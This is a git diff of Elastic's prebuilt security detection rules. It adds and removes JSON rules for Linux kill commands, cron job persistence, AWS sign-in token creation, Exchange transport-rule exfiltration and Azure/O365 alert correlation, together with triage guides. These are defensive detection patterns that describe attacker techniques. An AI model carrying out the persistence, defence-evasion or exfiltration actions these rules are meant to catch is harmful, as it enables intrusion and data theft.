\"198.51.100.0/24\", \"203.0.113.0/24\",\n \"240.0.0.0/4\", \"::1\", \"FE80::/10\", \"FF00::/8\"\n )\n\n// capture relevant raw fields\n| keep source.ip, event.action, event.outcome, event.dataset, kibana.alert.rule.name, event.category\n\n// classify each source ip based on alert type\n| eval\n Esql.source_ip_mail_access_case = case(event.dataset == \"o365.audit\" and event.action == \"MailItemsAccessed\" and event.outcome == \"success\", to_ip(source.ip), null),\n Esql.source_ip_azure_signin_case = case(event.dataset == \"azure.signinlogs\" and event.outcome == \"success\", to_ip(source.ip), null),\n Esql.source_ip_network_alert_case = case(kibana.alert.rule.name == \"external alerts\" and not event.dataset in (\"o365.audit\", \"azure.signinlogs\"), to_ip(source.ip), null)\n\n// aggregate by source ip\n| stats\n Esql.event_count = count(*),\n Esql.source_ip_mail_access_case_count_distinct = count_distinct(Esql.source_ip_mail_access_case),\n Esql.source_ip_azure_signin_case_count_distinct = count_distinct(Esql.source_ip_azure_signin_case),\n Esql.source_ip_network_alert_case_count_distinct = count_distinct(Esql.source_ip_network_alert_case),\n Esql.event_dataset_count_distinct = count_distinct(event.dataset),\n Esql.event_dataset_values = values(event.dataset),\n Esql.kibana_alert_rule_name_values = values(kibana.alert.rule.name),\n Esql.event_category_values = values(event.category)\n by Esql.source_ip = to_ip(source.ip)\n\n// correlation condition\n| where\n Esql.source_ip_network_alert_case_count_distinct > 0\n and Esql.event_dataset_count_distinct >= 2\n and (Esql.source_ip_mail_access_case_count_distinct > 0 or Esql.source_ip_azure_signin_case_count_distinct > 0)\n and Esql.event_count <= 100\n", + "related_integrations": [ + { + "package": "azure", + "version": "^1.0.0" + }, + { + "package": "o365", + "version": "^2.0.0" + } + ], "risk_score": 73, "rule_id": "f0cc239b-67fa-46fc-89d4-f861753a40f5", "setup": "The Azure 
Fleet integration, Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", diff --git a/packages/security_detection_engine/kibana/security_rule/f391d3fd-219b-42a3-9ba9-2f66eb0155aa_1.json b/packages/security_detection_engine/kibana/security_rule/f391d3fd-219b-42a3-9ba9-2f66eb0155aa_1.json deleted file mode 100644 index b2c850d6b98..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/f391d3fd-219b-42a3-9ba9-2f66eb0155aa_1.json +++ /dev/null @@ -1,128 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "This rule detects the execution of kill, pkill, and killall commands on Linux systems. These commands are used to terminate processes on a system. Attackers may use these commands to kill security tools or other processes to evade detection or disrupt system operations.", - "from": "now-9m", - "history_window_start": "now-7d", - "index": [ - "logs-endpoint.events.process*" - ], - "language": "kuery", - "license": "Elastic License v2", - "name": "Kill Command Execution", - "new_terms_fields": [ - "host.id", - "process.parent.executable" - ], - "query": "event.category:process and host.os.type:linux and event.type:start and event.action:exec and\nprocess.name:(kill or pkill or killall)\n", - "related_integrations": [ - { - "package": "endpoint", - "version": "^8.2.0" - } - ], - "required_fields": [ - { - "ecs": true, - "name": "event.action", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.category", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.type", - "type": "keyword" - }, - { - "ecs": true, - "name": "host.os.type", - "type": "keyword" - }, - { - "ecs": true, - "name": "process.name", - "type": "keyword" - } - ], - "risk_score": 21, - "rule_id": "f391d3fd-219b-42a3-9ba9-2f66eb0155aa", - "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", - "severity": "low", - "tags": [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Defense Evasion", - "Data Source: Elastic Defend" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0005", - "name": "Defense Evasion", - "reference": "https://attack.mitre.org/tactics/TA0005/" - }, - "technique": [ - { - "id": "T1564", - "name": "Hide Artifacts", - "reference": "https://attack.mitre.org/techniques/T1564/", - "subtechnique": [ - { - "id": "T1564.001", - "name": "Hidden Files and Directories", - "reference": "https://attack.mitre.org/techniques/T1564/001/" - } - ] - }, - { - "id": "T1562", - "name": "Impair Defenses", - "reference": "https://attack.mitre.org/techniques/T1562/", - "subtechnique": [ - { - "id": "T1562.006", - "name": "Indicator Blocking", - "reference": "https://attack.mitre.org/techniques/T1562/006/" - } - ] - } - ] - }, - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0002", - "name": "Execution", - "reference": "https://attack.mitre.org/tactics/TA0002/" - }, - "technique": [ - { - "id": "T1059", - "name": "Command and Scripting Interpreter", - "reference": "https://attack.mitre.org/techniques/T1059/", - "subtechnique": [ - { - "id": "T1059.004", - "name": "Unix Shell", - "reference": "https://attack.mitre.org/techniques/T1059/004/" - } - ] - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "new_terms", - "version": 1 - }, - "id": "f391d3fd-219b-42a3-9ba9-2f66eb0155aa_1", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/f754e348-f36f-4510-8087-d7f29874cc12_1.json b/packages/security_detection_engine/kibana/security_rule/f754e348-f36f-4510-8087-d7f29874cc12_1.json new file mode 100644 index 00000000000..657c3464f64 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/f754e348-f36f-4510-8087-d7f29874cc12_1.json @@ -0,0 +1,111 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "building_block_type": "default", + "description": "Captures requests to the AWS federation endpoint (signin.amazonaws.com) for GetSigninToken. This API exchanges existing temporary AWS credentials (e.g., from STS GetFederationToken or AssumeRole) for a short-lived sign-in token that is embedded in a one-click URL to the AWS Management Console. It is commonly used by custom federation tools and automation to pivot from programmatic access to a browser session. This is a building block rule meant to be used for correlation with other rules to detect suspicious activity.", + "false_positives": [ + "Legitimate federation workflows, admin portals, SSO helpers, CI/CD jobs, or internal scripts that create one-click console links, commonly invoke GetSigninToken and may generate frequent benign events." 
+ ], + "from": "now-6m", + "index": [ + "filebeat-*", + "logs-aws.cloudtrail-*" + ], + "investigation_fields": { + "field_names": [ + "@timestamp", + "user.name", + "user_agent.original", + "source.ip", + "aws.cloudtrail.user_identity.arn", + "aws.cloudtrail.user_identity.type", + "aws.cloudtrail.user_identity.session_context.session_issuer.arn", + "aws.cloudtrail.user_identity.session_context.session_issuer.type", + "aws.cloudtrail.user_identity.access_key_id", + "event.action", + "event.outcome", + "cloud.account.id", + "cloud.region" + ] + }, + "language": "kuery", + "license": "Elastic License v2", + "name": "AWS Sign-In Token Created", + "query": "event.dataset: \"aws.cloudtrail\" and \n event.provider: \"signin.amazonaws.com\" and \n event.action : \"GetSigninToken\" and \n event.outcome: \"success\"\n", + "references": [ + "https://hackingthe.cloud/aws/post_exploitation/create_a_console_session_from_iam_credentials/" + ], + "related_integrations": [ + { + "integration": "cloudtrail", + "package": "aws", + "version": "^4.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "f754e348-f36f-4510-8087-d7f29874cc12", + "severity": "low", + "tags": [ + "Domain: Cloud", + "Data Source: AWS", + "Data Source: Amazon Web Services", + "Data Source: AWS Sign-In", + "Use Case: Identity and Access Audit", + "Tactic: Initial Access", + "Rule Type: BBR" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0001", + "name": "Initial Access", + "reference": "https://attack.mitre.org/tactics/TA0001/" + }, + "technique": [ + { + "id": "T1078", + "name": "Valid Accounts", + "reference": "https://attack.mitre.org/techniques/T1078/", + "subtechnique": [ + { + "id": "T1078.004", + "name": "Cloud Accounts", + "reference": "https://attack.mitre.org/techniques/T1078/004/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 1 + }, + "id": "f754e348-f36f-4510-8087-d7f29874cc12_1", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/ff10d4d8-fea7-422d-afb1-e5a2702369a9_15.json b/packages/security_detection_engine/kibana/security_rule/ff10d4d8-fea7-422d-afb1-e5a2702369a9_15.json deleted file mode 100644 index fcd79377a62..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/ff10d4d8-fea7-422d-afb1-e5a2702369a9_15.json +++ /dev/null @@ -1,156 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "This rule monitors for (ana)cron jobs being created or renamed. Linux cron jobs are scheduled tasks that can be leveraged by system administrators to set up scheduled tasks, but may be abused by malicious actors for persistence, privilege escalation and command execution. 
By creating or modifying cron job configurations, attackers can execute malicious commands or scripts at predefined intervals, ensuring their continued presence and enabling unauthorized activities.", - "from": "now-9m", - "index": [ - "logs-endpoint.events.file*" - ], - "language": "eql", - "license": "Elastic License v2", - "name": "Cron Job Created or Modified", - "note": "## Triage and analysis\n\n### Investigating Cron Job Created or Modified\nLinux cron jobs are scheduled tasks that run at specified intervals or times, managed by the cron daemon. \n\nBy creating or modifying cron job configurations, attackers can execute malicious commands or scripts at predefined intervals, ensuring their continued presence and enabling unauthorized activities.\n\nThis rule monitors the creation of cron jobs by monitoring for file creation and rename events in the most common cron job task location directories.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/current/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n> This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible Investigation Steps\n\n- Investigate the cron job file that was created or modified.\n- Investigate whether any other files in any of the available cron job directories have been altered through OSQuery.\n - !{osquery{\"label\":\"Osquery - Retrieve File Listing Information\",\"query\":\"SELECT * FROM file WHERE (path LIKE '/etc/cron.allow.d/%' OR path LIKE '/etc/cron.d/%' OR path LIKE '/etc/cron.hourly/%'\\nOR path LIKE '/etc/cron.daily/%' OR path LIKE '/etc/cron.weekly/%' OR path LIKE '/etc/cron.monthly/%' OR path LIKE\\n'/var/spool/cron/crontabs/%')\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Cron File Information\",\"query\":\"SELECT * FROM file WHERE (path = '/etc/cron.allow' OR path = '/etc/cron.deny' OR path = '/etc/crontab')\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Additional File Listing Information\",\"query\":\"SELECT f.path, u.username AS file_owner, g.groupname AS group_owner, datetime(f.atime, 'unixepoch') AS\\nfile_last_access_time, datetime(f.mtime, 'unixepoch') AS file_last_modified_time, datetime(f.ctime, 'unixepoch') AS\\nfile_last_status_change_time, datetime(f.btime, 'unixepoch') AS file_created_time, f.size AS size_bytes FROM file f LEFT\\nJOIN users u ON f.uid = u.uid LEFT JOIN groups g ON f.gid = g.gid WHERE ( path LIKE '/etc/cron.allow.d/%' OR path LIKE\\n'/etc/cron.d/%' OR path LIKE '/etc/cron.hourly/%' OR path LIKE '/etc/cron.daily/%' OR path LIKE '/etc/cron.weekly/%' OR\\npath LIKE '/etc/cron.monthly/%' OR path LIKE '/var/spool/cron/crontabs/%')\\n\"}}\n- Investigate the script execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Investigate whether the altered scripts call other malicious scripts elsewhere on the file system. \n - If scripts or executables were dropped, retrieve the files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - File access, modification, and creation activities.\n- Investigate abnormal behaviors by the subject process/user such as network connections, file modifications, and any other spawned child processes.\n - Investigate listening ports and open sockets to look for potential command and control traffic or data exfiltration.\n - !{osquery{\"label\":\"Osquery - Retrieve Listening Ports\",\"query\":\"SELECT pid, address, port, socket, protocol, path FROM listening_ports\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Open Sockets\",\"query\":\"SELECT pid, family, remote_address, remote_port, socket, state FROM process_open_sockets\"}}\n - Identify the user account that performed the action, analyze it, and check whether it should perform this kind of action.\n - !{osquery{\"label\":\"Osquery - Retrieve Information for a Specific User\",\"query\":\"SELECT * FROM users WHERE username = {{user.name}}\"}}\n- Investigate whether the user is currently logged in and active.\n - !{osquery{\"label\":\"Osquery - Investigate the Account Authentication Status\",\"query\":\"SELECT * FROM logged_in_users WHERE user = {{user.name}}\"}}\n\n### False Positive Analysis\n\n- If this activity is related to new benign software installation activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- If this activity is related to a system administrator who uses cron jobs for administrative purposes, consider adding exceptions for this specific administrator user account. \n- Try to understand the context of the execution by thinking about the user, machine, or business purpose. 
A small number of endpoints, such as servers with unique software, might appear unusual but satisfy a specific business need.\n\n### Related Rules\n\n- Suspicious File Creation in /etc for Persistence - 1c84dd64-7e6c-4bad-ac73-a5014ee37042\n- Potential Persistence Through Run Control Detected - 0f4d35e4-925e-4959-ab24-911be207ee6f\n- Potential Persistence Through init.d Detected - 474fd20e-14cc-49c5-8160-d9ab4ba16c8b\n- Systemd Timer Created - 7fb500fa-8e24-4bd1-9480-2a819352602c\n- Systemd Service Created - 17b0a495-4d9f-414c-8ad0-92f018b8e001\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Delete the service/timer or restore its original configuration.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", - "query": "file where host.os.type == \"linux\" and\nevent.action in (\"rename\", \"creation\") and file.path : (\n \"/etc/cron.allow\", \"/etc/cron.deny\", \"/etc/cron.d/*\", \"/etc/cron.hourly/*\", \"/etc/cron.daily/*\", \"/etc/cron.weekly/*\",\n \"/etc/cron.monthly/*\", \"/etc/crontab\", \"/var/spool/cron/crontabs/*\", \"/var/spool/anacron/*\"\n) and not (\n process.executable in (\n \"/bin/dpkg\", \"/usr/bin/dpkg\", \"/bin/dockerd\", \"/usr/bin/dockerd\", \"/usr/sbin/dockerd\", \"/bin/microdnf\",\n \"/usr/bin/microdnf\", \"/bin/rpm\", \"/usr/bin/rpm\", \"/bin/snapd\", \"/usr/bin/snapd\", \"/bin/yum\", \"/usr/bin/yum\",\n \"/bin/dnf\", \"/usr/bin/dnf\", \"/bin/podman\", \"/usr/bin/podman\", \"/bin/dnf-automatic\", \"/usr/bin/dnf-automatic\",\n \"/bin/pacman\", \"/usr/bin/pacman\", \"/usr/bin/dpkg-divert\", \"/bin/dpkg-divert\", \"/sbin/apk\", \"/usr/sbin/apk\",\n \"/usr/local/sbin/apk\", \"/usr/bin/apt\", \"/usr/sbin/pacman\", \"/bin/podman\", \"/usr/bin/podman\", \"/usr/bin/puppet\",\n \"/bin/puppet\", \"/opt/puppetlabs/puppet/bin/puppet\", \"/usr/bin/chef-client\", \"/bin/chef-client\",\n \"/bin/autossl_check\", \"/usr/bin/autossl_check\", \"/proc/self/exe\", \"/dev/fd/*\", \"/usr/bin/pamac-daemon\",\n \"/bin/pamac-daemon\", \"/usr/local/bin/dockerd\", \"/opt/elasticbeanstalk/bin/platform-engine\",\n \"/opt/puppetlabs/puppet/bin/ruby\", \"/usr/libexec/platform-python\", \"/opt/imunify360/venv/bin/python3\",\n \"/opt/eset/efs/lib/utild\", \"/usr/sbin/anacron\", \"/usr/bin/podman\", \"/kaniko/kaniko-executor\"\n ) or\n file.path like (\"/var/spool/cron/crontabs/tmp.*\", \"/etc/cron.d/jumpcloud-updater\") or\n 
file.extension in (\"swp\", \"swpx\", \"swx\", \"dpkg-remove\") or\n file.Ext.original.extension == \"dpkg-new\" or\n process.executable : (\n \"/nix/store/*\", \"/var/lib/dpkg/*\", \"/tmp/vmis.*\", \"/snap/*\", \"/dev/fd/*\", \"/usr/libexec/platform-python*\"\n ) or\n process.executable == null or\n process.name in (\n \"crond\", \"executor\", \"puppet\", \"droplet-agent.postinst\", \"cf-agent\", \"schedd\", \"imunify-notifier\", \"perl\",\n \"jumpcloud-agent\", \"crio\", \"dnf_install\", \"utild\"\n ) or\n (process.name == \"sed\" and file.name : \"sed*\") or\n (process.name == \"perl\" and file.name : \"e2scrub_all.tmp*\") \n)\n", - "references": [ - "https://pberba.github.io/security/2022/01/30/linux-threat-hunting-for-persistence-systemd-timers-cron/", - "https://www.elastic.co/security-labs/primer-on-persistence-mechanisms" - ], - "related_integrations": [ - { - "package": "endpoint", - "version": "^8.2.0" - } - ], - "required_fields": [ - { - "ecs": true, - "name": "event.action", - "type": "keyword" - }, - { - "ecs": false, - "name": "file.Ext.original.extension", - "type": "unknown" - }, - { - "ecs": true, - "name": "file.extension", - "type": "keyword" - }, - { - "ecs": true, - "name": "file.name", - "type": "keyword" - }, - { - "ecs": true, - "name": "file.path", - "type": "keyword" - }, - { - "ecs": true, - "name": "host.os.type", - "type": "keyword" - }, - { - "ecs": true, - "name": "process.executable", - "type": "keyword" - }, - { - "ecs": true, - "name": "process.name", - "type": "keyword" - } - ], - "risk_score": 47, - "rule_id": "ff10d4d8-fea7-422d-afb1-e5a2702369a9", - "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", - "severity": "medium", - "tags": [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Persistence", - "Tactic: Privilege Escalation", - "Tactic: Execution", - "Data Source: Elastic Defend", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0003", - "name": "Persistence", - "reference": "https://attack.mitre.org/tactics/TA0003/" - }, - "technique": [ - { - "id": "T1053", - "name": "Scheduled Task/Job", - "reference": "https://attack.mitre.org/techniques/T1053/", - "subtechnique": [ - { - "id": "T1053.003", - "name": "Cron", - "reference": "https://attack.mitre.org/techniques/T1053/003/" - } - ] - } - ] - }, - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0004", - "name": "Privilege Escalation", - "reference": "https://attack.mitre.org/tactics/TA0004/" - }, - "technique": [ - { - "id": "T1053", - "name": "Scheduled Task/Job", - "reference": "https://attack.mitre.org/techniques/T1053/", - "subtechnique": [ - { - "id": "T1053.003", - "name": "Cron", - "reference": "https://attack.mitre.org/techniques/T1053/003/" - } - ] - } - ] - }, - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0002", - "name": "Execution", - "reference": "https://attack.mitre.org/tactics/TA0002/" - }, - "technique": [ - { - "id": "T1053", - "name": "Scheduled Task/Job", - "reference": "https://attack.mitre.org/techniques/T1053/", - "subtechnique": [ - { - "id": "T1053.003", - "name": "Cron", - "reference": "https://attack.mitre.org/techniques/T1053/003/" - } - ] - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "eql", - "version": 15 - }, - "id": "ff10d4d8-fea7-422d-afb1-e5a2702369a9_15", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/ff4dd44a-0ac6-44c4-8609-3f81bc820f02_207.json b/packages/security_detection_engine/kibana/security_rule/ff4dd44a-0ac6-44c4-8609-3f81bc820f02_207.json deleted file mode 100644 index 915b6a1693d..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/ff4dd44a-0ac6-44c4-8609-3f81bc820f02_207.json +++ /dev/null @@ -1,91 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Identifies a transport rule creation in Microsoft 365. As a best practice, Exchange Online mail transport rules should not be set to forward email to domains outside of your organization. An adversary may create transport rules to exfiltrate data.", - "false_positives": [ - "A new transport rule may be created by a system or network administrator. Verify that the configuration change was expected. Exceptions can be added to this rule to filter expected behavior." 
- ], - "from": "now-30m", - "index": [ - "filebeat-*", - "logs-o365*" - ], - "language": "kuery", - "license": "Elastic License v2", - "name": "Microsoft 365 Exchange Transport Rule Creation", - "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Microsoft 365 Exchange Transport Rule Creation\n\nMicrosoft 365 Exchange transport rules automate email handling, applying actions like forwarding or blocking based on conditions. While beneficial for managing communications, adversaries can exploit these rules to redirect emails externally, facilitating data exfiltration. The detection rule monitors successful creation of new transport rules, flagging potential misuse by identifying specific actions and outcomes in audit logs.\n\n### Possible investigation steps\n\n- Review the audit logs for the event.dataset:o365.audit to identify the user account responsible for creating the new transport rule.\n- Examine the event.provider:Exchange and event.category:web fields to confirm the context and source of the rule creation.\n- Investigate the event.action:\"New-TransportRule\" to understand the specific conditions and actions defined in the newly created transport rule.\n- Check the event.outcome:success to ensure the rule creation was completed successfully and assess if it aligns with expected administrative activities.\n- Analyze the transport rule settings to determine if it includes actions that forward emails to external domains, which could indicate potential data exfiltration.\n- Correlate the findings with other security events or alerts to identify any patterns or anomalies that might suggest malicious intent.\n\n### False positive analysis\n\n- Routine administrative tasks may trigger alerts when IT staff create or modify transport rules for legitimate purposes. To manage this, establish a baseline of expected rule creation activities and exclude these from alerts.\n- Automated systems or third-party applications that integrate with Microsoft 365 might create transport rules as part of their normal operation. Identify these systems and create exceptions for their known actions.\n- Changes in organizational policies or email handling procedures can lead to legitimate rule creations. Document these changes and update the monitoring system to recognize them as non-threatening.\n- Regular audits or compliance checks might involve creating temporary transport rules. 
Coordinate with audit teams to schedule these activities and temporarily adjust alert thresholds or exclusions during these periods.\n\n### Response and remediation\n\n- Immediately disable the newly created transport rule to prevent further unauthorized email forwarding or data exfiltration.\n- Conduct a thorough review of the audit logs to identify any other suspicious transport rules or related activities that may indicate a broader compromise.\n- Isolate the affected user accounts or systems associated with the creation of the transport rule to prevent further unauthorized access or actions.\n- Reset passwords and enforce multi-factor authentication for the affected accounts to secure access and prevent recurrence.\n- Notify the security team and relevant stakeholders about the incident for awareness and further investigation.\n- Escalate the incident to the incident response team if there is evidence of a broader compromise or if sensitive data has been exfiltrated.\n- Implement enhanced monitoring and alerting for transport rule changes to detect and respond to similar threats more effectively in the future.", - "query": "event.dataset:o365.audit and event.provider:Exchange and event.category:web and event.action:\"New-TransportRule\" and event.outcome:success\n", - "references": [ - "https://docs.microsoft.com/en-us/powershell/module/exchange/new-transportrule?view=exchange-ps", - "https://docs.microsoft.com/en-us/exchange/security-and-compliance/mail-flow-rules/mail-flow-rules" - ], - "related_integrations": [ - { - "package": "o365", - "version": "^2.0.0" - } - ], - "required_fields": [ - { - "ecs": true, - "name": "event.action", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.category", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.dataset", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.outcome", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.provider", - "type": "keyword" - } - ], - "risk_score": 47, - "rule_id": "ff4dd44a-0ac6-44c4-8609-3f81bc820f02", - "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "severity": "medium", - "tags": [ - "Domain: Cloud", - "Data Source: Microsoft 365", - "Use Case: Configuration Audit", - "Tactic: Exfiltration", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0010", - "name": "Exfiltration", - "reference": "https://attack.mitre.org/tactics/TA0010/" - }, - "technique": [ - { - "id": "T1537", - "name": "Transfer Data to Cloud Account", - "reference": "https://attack.mitre.org/techniques/T1537/" - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "query", - "version": 207 - }, - "id": "ff4dd44a-0ac6-44c4-8609-3f81bc820f02_207", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/manifest.yml b/packages/security_detection_engine/manifest.yml index 82e255cca6b..8b61379cfce 100644 --- a/packages/security_detection_engine/manifest.yml +++ b/packages/security_detection_engine/manifest.yml @@ -21,4 +21,4 @@ source: license: Elastic-2.0 title: Prebuilt Security Detection Rules type: integration -version: 8.19.8 +version: 8.19.9-beta.1
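As a companion to the Microsoft 365 Exchange Transport Rule Creation guidance above, the following hunting query is a minimal sketch for narrowing successful New-TransportRule events down to rules that add or redirect recipients, the pattern most relevant to exfiltration. It is not part of the shipped rule; it assumes the o365 integration maps cmdlet parameters under o365.audit.Parameters.* (for example RedirectMessageTo, BlindCopyTo, AddToRecipients), so verify those field names against your ingested documents before relying on it.

  event.dataset:o365.audit and event.provider:Exchange and event.category:web and
  event.action:"New-TransportRule" and event.outcome:success and
  (o365.audit.Parameters.RedirectMessageTo:* or
   o365.audit.Parameters.BlindCopyTo:* or
   o365.audit.Parameters.AddToRecipients:*)

Any hits should still be validated against change records, since administrators legitimately create forwarding and journaling rules for compliance workflows.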